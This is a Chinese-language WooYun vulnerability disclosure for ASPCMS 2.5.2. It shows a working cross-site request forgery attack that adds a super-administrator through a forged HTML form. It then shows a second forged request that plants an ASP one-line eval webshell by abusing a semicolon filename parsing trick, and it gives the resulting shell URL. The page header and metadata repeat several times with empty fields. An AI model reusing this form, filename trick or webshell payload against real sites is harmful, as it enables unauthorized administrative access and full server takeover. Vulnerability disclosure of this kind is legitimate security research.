ASPCMS最新版CSRF添加管理员及GetShell | wooyun-2014-060508| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060508

漏洞标题：ASPCMS最新版CSRF添加管理员及GetShell

漏洞作者：路人甲

提交时间：2014-05-13 11:10

修复时间：2014-08-11 11:12

公开时间：2014-08-11 11:12

漏洞类型：CSRF

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-13：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-08-11：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

ASPCMS最新版2.5.2
CSRF添加管理员：
后台添加管理员的请求如下：
链接：http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add
POST：GroupID=1&LoginName=111111&Password=111111&AdminDesc=111111&UserStatus=1
可以看到没有防御CSRF
我们构造伪造表单：

<FORM name="form" action="http://10.65.203.100:90/admin_aspcms/_user/_Admin/AspCms_AdminAdd.asp?action=add" method="post" >
<TD align=middle width=100 height=30>管理员组</TD>
<select name="GroupID" id="GroupID">
<option value="1" >超级管理员组</option>
<option value="6" >lpyuan</option>
<option value="5" >普通管理员</option>
</select>
<TD align=middle width=100 height=30>管理员名称</TD>
<INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="LoginName"/>
<TD align=middle width=100 height=30>管理员密码</TD>
<INPUT  type="Password" class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="Password"/> 
<TD align=middle width=100 height=30>管理员描述</TD>
<INPUT class="input" style="FONT-SIZE: 12px; WIDTH: 300px" maxLength="200" name="AdminDesc"/>
<TD align=middle width=100 height=30>状态</TD>
<INPUT class="checkbox" type="checkbox" name="UserStatus" checked="checked" value="1"/>
<INPUT class="button" type="submit" value="添加" />  
</FORM>

漏洞利用之前：

CSRF添加管理员的过程：

未作任何验证，成功添加管理员，来看看添加结果：

CSRF直接GetShell：
后台编辑模板时，发送请求如下，我们可以添加模板的filename和filetext：
http://10.65.203.100:90/admin_aspcms/_style/AspCms_TemplateAdd.asp?acttype=html&action=add
filename=111111.asp;111111.html&filetext=%3C%25eval%20request%28%5C%27wooyun%5C%27%29%25%3E
再此过程中也没有做任何验证，而且对添加模板的文件名也没有严格处理，导致CSRF直接获取webshell：

shell地址为：
http://10.65.203.100:90//Templates/cn2014/html/111111.asp;111111.html

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060508

漏洞标题：ASPCMS最新版CSRF添加管理员及GetShell

相关厂商：ASPCMS

漏洞作者：路人甲

提交时间：2014-05-13 11:10

修复时间：2014-08-11 11:12

公开时间：2014-08-11 11:12

漏洞类型：CSRF

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-060508

漏洞标题：ASPCMS最新版CSRF添加管理员及GetShell

相关厂商：ASPCMS

漏洞作者： 路人甲

提交时间：2014-05-13 11:10

修复时间：2014-08-11 11:12

公开时间：2014-08-11 11:12

漏洞类型：CSRF

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-060508"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云